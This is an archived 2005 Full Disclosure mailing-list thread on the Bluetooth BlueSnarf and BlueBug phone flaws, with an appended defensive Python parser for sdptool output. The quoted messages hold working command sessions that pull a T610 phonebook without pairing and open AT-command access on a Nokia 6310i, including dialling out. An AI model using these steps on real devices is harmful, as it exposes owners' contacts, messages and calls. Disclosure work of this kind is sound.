Full Disclosure mailing list archives
Re: Re: Bluetooth: BlueSnarf and BlueBug Full Disclosure
From: Scott Renna <srenna () vdbmusic com>
Date: Sun, 09 Jan 2005 19:04:49 -0500
When I saw Adam's announcement a while back on these issues, I wrote a paper up for SANS. It describes running the attack from a FreeBSD-based system against a T610. Check out:
http://www.giac.org/practical/GCIA/Scott_Renna_GCIA.pdf

Eric Detoisien wrote:
An easy way to get the phonebook on an Ericsson T610 via Bluetooth without pairing:

tough:~# hcitool scan
Scanning ...
        00:0A:D9:XX:XX:XX       T610
tough:~# sdptool browse 00:0A:D9:XX:XX:XX
Browsing 00:0A:D9:XX:XX:XX ...
[...]
Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 10          -----------------------> only RFCOMM channels 10 and 15 are open
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100
[...]
Service Name: OBEX Basic Imaging
Service RecHandle: 0x1000b
Service Class ID List:
  "" (0x111b)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 15
  "OBEX" (0x0008)
Profile Descriptor List:
  "" (0x111a)
    Version: 0x0100
[...]
tough:~# obexftp -b 00:0A:D9:XX:XX:XX -B 10 -g telecom/pb.vcf
Browsing 00:0A:D9:FA:03:B7 ...
Channel: 7
No custom transport
Connecting...bt: 1
done
Receiving telecom/pb.vcf.../done
Disconnecting...done

Eric Detoisien

The Bluebug, as described on [1], is trivially exploitable on some non-Symbian Nokia phones. It allows an attacker to create a serial profile connection without pairing or asking for permission, and therefore gives unauthorized access to all AT commands. It is possible to read/delete/send SMS messages, add/view/delete phonebook entries, change call diverts, and initiate voice or data calls.

Demonstration on a Nokia 6310i:

laptop:~# hcitool scan
Scanning ...
        00:60:57:38:8C:D8       Nokia 6310i
laptop:~# rfcomm bind /dev/rfcomm0 00:60:57:38:8C:D8 17

Now you can use plain AT commands, as described in the manual [2] or Gnokii [3], for example:

laptop:~# cu -l rfcomm0 -s 9600
Connected.
[ATE1]
OK
ATI
Nokia
OK
AT+CPBS?
+CPBS: "SM",0,100
OK
AT+CPBR=?
+CPBR: (1-100),48,18
OK
ATDT+48609xxxxxx
OK

As you can see, the bug is really trivial and looks rather like a backdoor.
[1] - http://www.thebunker.net/security/bluetooth.htm
[2] - http://ncsp.forum.nokia.com/download/?asset_id=11579;ref=devx
[3] - http://www.gnokii.org/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
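As an added example (not part of the thread or of any poster's code), a small inventory parser for the `sdptool browse` output quoted above: it maps each advertised RFCOMM channel to its service and flags profiles an audit should call out. The sample records and the watch list are constructed from the thread; note that a channel bound directly, like the Nokia's 17, has no SDP record and so never shows up in such an inventory.

```python
import re

# Constructed sample: the two records the thread quotes from `sdptool browse`
# on the T610, trimmed to the lines an inventory needs.
SAMPLE_SDP = """\
Service Name: OBEX Object Push
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 10

Service Name: OBEX Basic Imaging
Service Class ID List:
  "" (0x111b)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 15
"""

# Constructed watch list: OBEX Object Push is what the thread shows answering
# without pairing; Serial Port is the profile behind AT-command access.
WATCHED_CLASSES = {0x1105: "OBEX Object Push", 0x1101: "Serial Port"}
UUID_RE = re.compile(r'"(?P<name>[^"]*)" \((?P<uuid>0x[0-9a-fA-F]{4})\)')


def parse_sdp(text: str) -> list:
    """Split sdptool output into records: name, class UUIDs, RFCOMM channel."""
    records: list = []
    in_classes = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Service Name:"):
            records.append({"name": line.split(":", 1)[1].strip(), "classes": [], "channel": None})
        elif line.endswith("List:"):
            in_classes = line.startswith("Service Class ID List:")   # only class UUIDs are collected
        elif line.startswith("Channel:") and records:
            records[-1]["channel"] = int(line.split(":", 1)[1])     # RFCOMM channel of the record
        elif in_classes and records and (m := UUID_RE.fullmatch(line)):
            records[-1]["classes"].append(int(m.group("uuid"), 16))
    return records


def rfcomm_channels(records: list) -> dict:
    """Advertised RFCOMM channel -> service name (unadvertised channels are invisible here)."""
    return {r["channel"]: r["name"] for r in records if r["channel"] is not None}


def watched_services(records: list) -> list:
    """Records whose service class is on the watch list, with their RFCOMM channel."""
    return [(r["name"], r["channel"]) for r in records if any(c in WATCHED_CLASSES for c in r["classes"])]
```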